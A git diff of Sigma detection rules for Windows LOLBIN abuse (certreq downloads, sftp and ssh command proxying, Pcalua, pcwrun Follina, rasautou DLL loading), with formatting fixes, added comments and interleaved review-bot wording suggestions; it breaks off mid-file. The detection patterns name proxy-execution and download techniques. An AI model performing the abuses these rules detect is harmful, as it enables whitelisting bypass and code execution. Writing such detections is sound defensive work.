diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml index 411590f4f..930152d14 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml @@ -1,8 +1,7 @@ title: Use of OpenConsole id: 814c95cc-8192-4378-a70a-f1aafd877af1 status: test -description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries - to bypass application Whitelisting +description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting references: - https://twitter.com/nas_bench/status/1537563834478645252 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: OpenConsole.exe - - Image|endswith: \OpenConsole.exe + - OriginalFileName: OpenConsole.exe + - Image|endswith: \OpenConsole.exe filter: - Image|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal + Image|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal # We exclude the default path for WindowsTerminal condition: process_creation and (selection and not filter) falsepositives: - Legitimate use by an administrator diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml index a7246a29f..937ad0779 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \OpenWith.exe - CommandLine|contains: /c + CommandLine|contains: /c condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml index 39e7d1bd7..62cbf73f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml @@ -1,17 +1,14 @@ title: Use of Pcalua For Execution id: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 related: - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: test -description: Detects execition of commands and binaries from the context of The program - compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to - bypass application whitelisting. +description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic - Blue Detections, Endgame), oscd.community +author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2023/01/04 tags: @@ -27,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \pcalua.exe - CommandLine|contains: ' -a' + CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there a "-a" condition: process_creation and selection falsepositives: - Legitimate use by a via a batch script or by an administrator. diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml index c501e912d..a26001405 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml @@ -1,8 +1,7 @@ title: Indirect Command Execution By Program Compatibility Wizard id: b97cd4b1-30b8-4a9d-bd72-6293928d52bc status: test -description: Detect indirect command execution via Program Compatibility Assistant - pcwrun.exe +description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe references: - https://twitter.com/pabraeken/status/991335019833708544 - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/ @@ -30,8 +29,7 @@ fields: - ParentCommandLine - CommandLine falsepositives: - - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers - as opposed to commonly seen artifacts + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts - Legit usage of scripts level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml index 0f32b0df3..e0a4da631 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml @@ -1,8 +1,7 @@ title: Execute Pcwrun.EXE To Leverage Follina id: 6004abd0-afa4-4557-ba90-49d172e0a299 status: test -description: Detects indirect command execution via Program Compatibility Assistant - "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability +description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nas_bench/status/1535663791362519040 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \pcwrun.exe - CommandLine|contains: ../ + CommandLine|contains: ../ condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml index c876c5875..9e9ec7b02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml @@ -1,8 +1,7 @@ title: Code Execution via Pcwutl.dll id: 9386d78a-7207-4048-9c9f-a93a7c2d1c05 status: test -description: Detects launch of executable by calling the LaunchApplication function - from pcwutl.dll library. +description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. references: - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/ - https://twitter.com/harr0ey/status/989617817849876488 @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - pcwutl - LaunchApplication condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml index cf01ed10e..2c595d180 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester.yml 
@@ -1,11 +1,10 @@ title: Execute Code with Pester.bat as Parent id: 18988e1b-9087-4f8a-82fe-0414dce49878 related: - - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e - type: similar + - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e + type: similar status: test -description: Detects code execution via Pester.bat (Pester - Powershell Modulte for - testing) +description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) references: - https://twitter.com/Oddvarmoe/status/993383596244258816 - https://twitter.com/_st0pp3r_/status/1560072680887525378 diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml index 8fae507cb..f7cdb7e39 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml @@ -1,8 +1,7 @@ title: Execute Code with Pester.bat id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e status: test -description: Detects code execution via Pester.bat (Pester - Powershell Modulte for - testing) +description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) references: - https://twitter.com/Oddvarmoe/status/993383596244258816 - https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md @@ -26,16 +25,16 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains|all: + CommandLine|contains|all: - Pester - Get-Help cmd_execution: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - pester - ; get_help: - CommandLine|contains: + CommandLine|contains: - help - \? condition: process_creation and (powershell_module or (cmd_execution and get_help)) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml index 804110322..8b2476225 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml @@ -1,8 +1,7 @@ title: PrintBrm ZIP Creation of Extraction id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 status: test -description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to - create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. +description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. references: - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/ author: frack113 @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \PrintBrm.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' -f' - .zip condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml index c82dbde97..380a4099c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml @@ -1,8 +1,7 @@ title: Pubprn.vbs Proxy Execution id: 1fb76ab8-fa60-4b01-bddd-71e89bf555da status: test -description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute - commands. +description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. references: - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/ author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \pubprn.vbs - 'script:' condition: process_creation and selection 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml index 96afc367f..5d3a4e5bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml @@ -1,8 +1,7 @@ title: DLL Execution via Rasautou.exe id: cd3d1298-eb3b-476c-ac67-12847de55813 status: test -description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d - option and executes the export specified in -p. +description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. references: - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/ - https://github.com/fireeye/DueDLLigence 
@@ -16,19 +15,16 @@ tags: logsource: product: windows category: process_creation - definition: Since options '-d' and '-p' were removed in Windows 10 this rule is - relevant only for Windows before 10. And as Windows 7 doesn't log command - line in 4688 by default, to detect this attack you need Sysmon 1 configured - or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) + definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rasautou.exe - - OriginalFileName: rasdlui.exe + - Image|endswith: \rasautou.exe + - OriginalFileName: rasdlui.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - ' -p ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml index 37ee9fa78..6a7140a18 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml 
@@ -1,8 +1,7 @@ title: REGISTER_APP.VBS Proxy Execution id: 1c8774a0-44d4-4db0-91f8-e792359c70bd status: test -description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register - a VSS/VDS Provider as a COM+ application. +description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \register_app.vbs - -register condition: process_creation and selection falsepositives: - - Legitimate usage of the script. Always investigate what's being registered to - confirm if it's benign + - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml index f3a1a9c24..3d8e02f77 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_remote.yml @@ -1,8 +1,7 @@ title: Use of Remote.exe id: 4eddc365-79b4-43ff-a9d7-99422dc34b93 status: test -description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL - bypass and running remote files. +description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. references: - https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/ 
@@ -20,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \remote.exe - - OriginalFileName: remote.exe + - Image|endswith: \remote.exe + - OriginalFileName: remote.exe condition: process_creation and selection falsepositives: - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml index b9d7bc374..2f43cc6ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_replace.yml @@ -1,8 +1,7 @@ title: Replace.exe Usage id: 9292293b-8496-4715-9db6-37028dcda4b3 status: test -description: Detects the use of Replace.exe which can be used to replace file with - another file +description: Detects the use of Replace.exe which can be used to replace file with another file references: - https://lolbas-project.github.io/lolbas/Binaries/Replace/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace @@ -23,7 +22,7 @@ detection: selection: Image|endswith: \replace.exe argument: - CommandLine|contains: + CommandLine|contains: - /a - -a condition: process_creation and (selection and argument) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml index 91374161f..20c336aac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml 
@@ -1,8 +1,7 @@ title: Lolbin Runexehelper Use As Proxy id: cd71385d-fd9b-4691-9b98-2b1f7e508714 status: test -description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other - programs +description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs references: - https://twitter.com/0gtweet/status/1206692239839289344 - https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml index d8cd105b5..62dfe21f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml @@ -22,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \Runscripthelper.exe - CommandLine|contains: surfacecheck + CommandLine|contains: surfacecheck condition: process_creation and selection fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml index 0ba83459a..23f39bb42 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml @@ -1,8 +1,7 @@ title: Use of Scriptrunner.exe id: 64760eef-87f7-4ed3-93fd-655668ea9420 status: test -description: The "ScriptRunner.exe" binary can be abused to proxy execution through - it and bypass possible whitelisting +description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting references: - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ScriptRunner.exe - - OriginalFileName: ScriptRunner.exe + - Image|endswith: \ScriptRunner.exe + - OriginalFileName: ScriptRunner.exe selection_cli: - CommandLine|contains: ' -appvscript ' + CommandLine|contains: ' -appvscript ' condition: process_creation and (all of selection*) falsepositives: - Legitimate use when App-v is deployed diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml index ad97d0b73..9888a58c8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_setres.yml @@ -1,9 +1,7 @@ title: Use of Setres.exe id: 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7 status: test -description: Detects the use of Setres.exe to set the screen resolution and then potentially - launch a file named "choice" (with any executable extension such as ".cmd" or - ".exe") from the current execution path +description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path references: - https://lolbas-project.github.io/lolbas/Binaries/Setres/ - https://twitter.com/0gtweet/status/1583356502340870144 diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml index 09e66d572..4ea77a5cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml 
@@ -1,8 +1,7 @@ title: Use Of The SFTP.EXE Binary As A LOLBIN id: a85ffc3a-e8fd-4040-93bf-78aff284d801 status: test -description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the - "-D" flag +description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag references: - https://github.com/LOLBAS-Project/LOLBAS/pull/264 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - Image|endswith: \sftp.exe - CommandLine|contains: + Image|endswith: \sftp.exe # The "sftp.exe" located in the OpenSSH directory has no OriginalFileName :( + CommandLine|contains: + # Since "-D" is a valid flag for other usage we assume the user is going to enter a path + # Either a full one like "C:\Windows\System32\calc.exe" or a relative one "..\..\..\Windows\System32\calc.exe" + # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule) - ' -D ..' - ' -D C:\' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml index 730947709..606b5486e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml 
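Review bot: The three comment lines added under `CommandLine|contains` and the one on `Image|endswith: \sftp.exe` are written in first person and with informal tone ("In my testing", ":(") which does not match the rest of the rule set. Suggest neutral phrasing such as `# The OpenSSH build of sftp.exe carries no OriginalFileName, so only the image path is matched` and `# "-D" is a legitimate flag elsewhere; the rule keys on an absolute or relative path argument following it`. The matched values cover only relative paths and the C: drive; if that scope is intentional, stating it in the comment would help maintainers tune the rule rather than leaving the "please update the rule" appeal.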
@@ -1,9 +1,7 @@ title: Sideloading Link.EXE id: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6 status: test -description: Detects the execution utitilies often found in Visual Studio tools that - hardcode the call to the binary "link.exe". They can be abused to sideload any - binary with the same name +description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name references: - https://twitter.com/0gtweet/status/1560732860935729152 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +19,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \link.exe - CommandLine|contains: LINK / + CommandLine|contains: LINK / # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc + # Add other filters for other legitimate locations filter_visual_studio: ParentImage|startswith: - C:\Program Files\Microsoft Visual Studio\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml index 274045fa5..b4e9a9452 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml @@ -1,8 +1,7 @@ title: Suspicious Sigverif Execution id: 7d4aaec2-08ed-4430-8b96-28420e030e04 status: test -description: Detects the execution of sigverif binary as a parent process which could - indicate it being used as a LOLBIN to proxy execution +description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution references: - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ - https://twitter.com/0gtweet/status/1457676633809330184 
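Review bot: The line `# Add other filters for other legitimate locations` is inserted between the selection and `filter_visual_studio` as a bare instruction, so it is unclear whether it is a reminder or an explanation of the filter's scope. Suggest marking it explicitly and placing it directly above the filter, e.g. `# TODO: extend filter_visual_studio with other legitimate install locations`; the `ParentImage|startswith` list it refers to continues past the end of this hunk. The unwrapped description in the first hunk also still reads "utitilies" (should be "utilities").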
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml index e7d4534ec..f32dfa7ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml @@ -23,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: + # ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R' ParentImage: C:\Windows\System32\OpenSSH\sshd.exe selection_cli_img: Image|endswith: \ssh.exe selection_cli_flags: - - CommandLine|contains: ProxyCommand= - - CommandLine|contains|all: - - PermitLocalCommand - - LocalCommand + - CommandLine|contains: ProxyCommand= + - CommandLine|contains|all: + - PermitLocalCommand + - LocalCommand condition: process_creation and (selection_parent or all of selection_cli_*) falsepositives: - Legitimate usage for administration purposes diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml index 0111e6f6d..22cc5fb38 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml @@ -1,8 +1,7 @@ title: Suspicious LOLBIN AccCheckConsole id: 0f6da907-5854-4be6-859a-e9958747b0aa status: test -description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as - used to load an arbitrary DLL +description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL references: - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - https://twitter.com/bohops/status/1477717351017680899?s=12 
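Review bot: The commented-out `# ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R'` inside `selection_parent` looks like a disabled condition rather than documentation, and a reader cannot tell whether it records an observed value or is meant to be re-enabled. If it is reference material, suggest `# Observed parent command line (not matched, ParentImage is sufficient): "C:\Windows\System32\OpenSSH\sshd.exe" -R`; if it is intended as a condition, it should be a proper field rather than a comment. The rest of the hunk is indentation only and needs no change.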
@@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \AccCheckConsole.exe - - OriginalFileName: AccCheckConsole.exe + - Image|endswith: \AccCheckConsole.exe + - OriginalFileName: AccCheckConsole.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -window ' - .dll condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml index fc18a7264..bb9df86f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml @@ -21,9 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: AtBroker.exe - CommandLine|contains: start + CommandLine|contains: start filter: - CommandLine|contains: + CommandLine|contains: - animations - audiodescription - caretbrowsing diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml index 5cf4d48d0..b837f57ef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml @@ -1,8 +1,7 @@ title: Suspicious Certreq Command to Download id: 4480827a-9799-4232-b2c4-ccc6c4e9e12b status: test -description: Detects a suspicious certreq execution taken from the LOLBAS examples, - which can be abused to download (small) files +description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files references: - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ author: Christian Burkard (Nextron Systems) 
@@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certreq.exe - - OriginalFileName: CertReq.exe + - Image|endswith: \certreq.exe + - OriginalFileName: CertReq.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -Post ' - ' -config ' - ' http' diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml index 47bcdd525..92de2c4c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml @@ -1,8 +1,7 @@ title: Suspicious Driver Install by pnputil.exe id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 status: test -description: Detects when a possible suspicious driver is being installed via pnputil.exe - lolbin +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin references: - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - -i - /install - -a 
@@ -36,9 +35,7 @@ fields: - ParentCommandLine falsepositives: - Pnputil.exe being used may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making - changes in your environment. - - Pnputil.exe being executed from unfamiliar users should be investigated. If - known behavior is causing false positives, it can be exempted from the rule. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
index 21d3cee2c..43bb66a32 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
@@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \DXCap.exe - - OriginalFileName: DXCap.exe + - Image|endswith: \DXCap.exe + - OriginalFileName: DXCap.exe selection_cli: - CommandLine|contains: ' -c ' + CommandLine|contains: ' -c ' # The ".exe" is not required to run the binary condition: process_creation and (all of selection*) falsepositives: - Legitimate execution of dxcap.exe by legitimate user
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml
index 794fb521b..7e96ef2c2 100644
